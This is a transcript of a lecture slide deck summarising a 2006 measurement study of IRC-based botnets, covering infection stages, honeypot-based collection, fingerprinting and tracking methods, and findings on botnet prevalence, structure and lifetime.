A Multifaceted Approach to Understand the Botnet Phenomenon
Download
Report
Transcript A Multifaceted Approach to Understand the Botnet Phenomenon
Published: Internet Measurement Conference (IMC) 2006
Presented by Wei-Cheng Xiao
2016/3/29
1
Outline
Introduction
Overview of IRC-based botnets
Data collection methodology
Analysis results
Related work
Conclusion
2016/3/29
2
Introduction
Botnet:
a network of infected hosts, called bots, that are
controlled by botmasters
The characteristic of botnets
The command and control (C&C) channel
Communication mechanisms
IRC (the majority, easy to distribute)
P2P
HTTP
2016/3/29
3
Why choosing IRC
Supports several forms of communication
Point-to-point, point-to-multipoint
Supports several forms of data dissemination
Provide open-source implemenations
2016/3/29
4
Motivation and Goals
Motivation
There are increases in botnet activity, but little
behavior is known.
Goals
Getting better understanding of botnets,
including
2016/3/29
the prevalence of botnet activity
the botnet subspecies diversity
the evolution of a botnet
5
Contributions
The development of a multifaceted infrastructure to
capture and concurrently track multiple botnets in the
wild
A comprehensive analysis of measurements reflecting
several important structural and behavioral aspects of
botnets
2016/3/29
6
Outline
Introduction
Overview of IRC-based botnets
Data collection methodology
Analysis results
Related work
Conclusion
2016/3/29
7
The Life Cycle of A Botnet Infection
2016/3/29
8
Step 1: Exploit
Exploit software
vulnerability of victim
hosts
by worms or malicious
email attachments
2016/3/29
9
Step 2: Download Bot Binary
Execute a shellcode to
download bot binary
from a specific location
and install it
2016/3/29
10
Step 3: DNS Lookup (optional)
Resolve the domain name of
the IRC server coded in the
binary
Avoid server unavailability
due to IP blocking
2016/3/29
11
Step 4: Join
Join the IRC server and C&C
channel listed in the binary
3 types of authentications
1.
2.
3.
2016/3/29
Bots authenticate to join
the server using passwords
in the binary
Bots authenticate to join
the C&C channel using
passwords in the binary
Botmasters authenticate to
the bot population to send
commands
12
Step 5: Parse and Execute
Commands
Parse commands from the
channel topic and execute
them
The topic contains default
commands for all bots
2016/3/29
13
Outline
Introduction
Overview of IRC-based botnets
Data collection methodology
Analysis results
Related work
Conclusion
2016/3/29
14
The Overall Data Collection Architecture
2016/3/29
15
The Three Main Phases
1.
Malware collection
Goal: collect bot binaries
2. Binary analysis via gray-box testing
Goal: analyze the binaries
3. Longitudinal tracking of botnets
Goal: track real botnets using the analysis results
2016/3/29
16
Phase 1: Malware Collection
Darknet: an allocated but unused portion of the IP address space
2016/3/29
17
Malware Collection
Environment setup
There are 14 nodes distributed in the PlantLab testbed.
These nodes have access to the darknet, whose IP space is located in
10 different class A networks.
Nepenthes
Mimics replies generated by vulnerable services to get shellcodes
Pass URLs in the shellcodes to the download station to fetch bot
binaries (why?)
Honeynet
Used to handle cases where Nepenthes failed
Running unpatched Windows XP on VM
VLAN
2016/3/29
18
Gateway
Route darknet traffic to Nepenthes and honeypots
half to Nepenthes, half to honeypots
Rotate routing among 8 class-C networks in the darknet
Use NAT to keep # of honeypots small
Act as a firewall to prevent honeypots from outgoing
attack and cross infections (VLAN)
Detect and manage IRC connections
2016/3/29
19
Phase 2: Binary analysis
(graybox)
2016/3/29
20
Binary Analysis
Environment setup
A sink (IRC server) monitors all network traffic.
A client, which is a VM with clean Windows XP
installed and binary executed, is connected to
the sink.
Two steps
Creating network fingerprints
Extracting IRC-related features
2016/3/29
21
The Two Steps
Creating network fingerprints (network level)
fnet = {DNS, IPs, Ports, Scan}
DNS: targets of any DNS requests
IPs: destination IP addresses
Ports: contacted ports on the server side
Scan: whether or not the IP scanning behavior is detected
Extracting IRC-related features (application level)
When an IRC session is detected, an IRC-fingerprint is
created:
firc = {PASS, NICK, USER, MODE, JOIN}.
fnet and firc provide enough information to join a botnet
in the wild.
2016/3/29
22
Dialect
Dialect: the syntax of botmasters’ commands and their
responses
Learning a botnet’s dialect is required for mimicking
actual bot behavior.
An IRC query engine plays the role of botmaster.
Commands come from
those observed in honeypots
source codes of public known bots
The output of the querying process becomes the
template.
2016/3/29
23
Phase 3: Longitudinal Tracking of
Botnets
2016/3/29
24
IRC Tracker (Drone):
An IRC clients who can join a real-world IRC channel.
A drone is given firc and the template.
Automatically answer queries based on the template
Pretend to be a dutiful bot
Must be intelligent enough
Mimicry improvement
Randomly join and leave
Change external IP
2016/3/29
25
DNS Tracking
Most bots find out IRC servers via DNS queries.
Probe about 800,000 real-world DNS servers
Query domain names of the IRC servers
A cache hits implies one or more bots
Shortcomings
Not all DNS server are probed.
# of hits provides only the lower bound of # of bots
Still useful when the broadcast feature in a botnet is
turned off.
2016/3/29
26
Outline
Introduction
Overview of IRC-based botnets
Data collection methodology
Analysis results
Related work
Conclusion
2016/3/29
27
Data collected
Started from Feb. 1st, 2006, including
Traffic traces over the span of 3 months
IRC logs over the span of 3 months, covering
data from more than 100 botnet channels
Results of DNS cache hits from tracking 65 IRC
servers on 800,000 DNS servers for more than 45
days
2016/3/29
28
Botnet Traffic Share
27% of SYNs are from
known botnet spreaders.
76% of SYNs direct to
target ports.
The two curves reveal
similar traffic pattern.
This is a low-bound
estimate.
2016/3/29
29
Botnet Prevalence: A Global Look
About 85,000 DNS servers are involved in at least
one botnet activity.
2016/3/29
30
Botnet Prevalence: A Global Look
2016/3/29
31
Botnet Spreading Patterns
Two types of botnet:
Type-I: fixed scanning
algorithm
Type-II: variable
scanning algorithm
Out of 192 IRC bots, 34
are Type-I.
Summery of Type-II scanning practice
2016/3/29
32
Botnet Growth Patterns
2016/3/29
33
Predominant Botnet Structures
1. Single IRC server (70%)
Prevalent among small botnets
2. Multiple IRC servers, bridged botnet (30%)
25% of which are public known servers
3. A botmaster controls multiple botnets
4. Some botnets migrate
2016/3/29
34
Effective Botnet Sizes and
Botnet Lifetime
Effective size: the # of online bots
The observed effective size was much smaller than
the footprint.
Bots usually stay connected for only 25 minutes.
May be due to client inavailability
More likely, botmasters ask them to leave.
Botnets, however, have long life time
84% IRC servers were still up at the end of study.
2016/3/29
35
Botnet Software Taxonomy
2016/3/29
36
Outline
Introduction
Overview of IRC-based botnets
Data collection methodology
Analysis results
Related work
Conclusion
2016/3/29
37
Related Work
Botnet Tracking: Exploring a Root-Cause
Methodology to Prevent DoS Attacks. ESORICS,
2005
Introduces the idea of using honeypots and
active responders to analyze the botnet behavior
Scalability, Fidelity, and Containment in the
Potemkin Virtual Honeyfarm. ACM SIGOPS, 2005
A very useful tool for botnet detection, but not
appropriate for long term botnet tracking
2016/3/29
38
Outline
Introduction
Overview of IRC-based botnets
Data collection methodology
Analysis results
Related work
Conclusion
2016/3/29
39
Conclusion
A multifaceted approach is proposed to
understand botnet phenomenon.
The results show that botnet is a major contributor
to the unwanted network traffic.
The scanning and pattern of botnets is quite
different from that of autonomous malware.
The effective size of botnets are much smaller than
that of fingerprints.
2016/3/29
40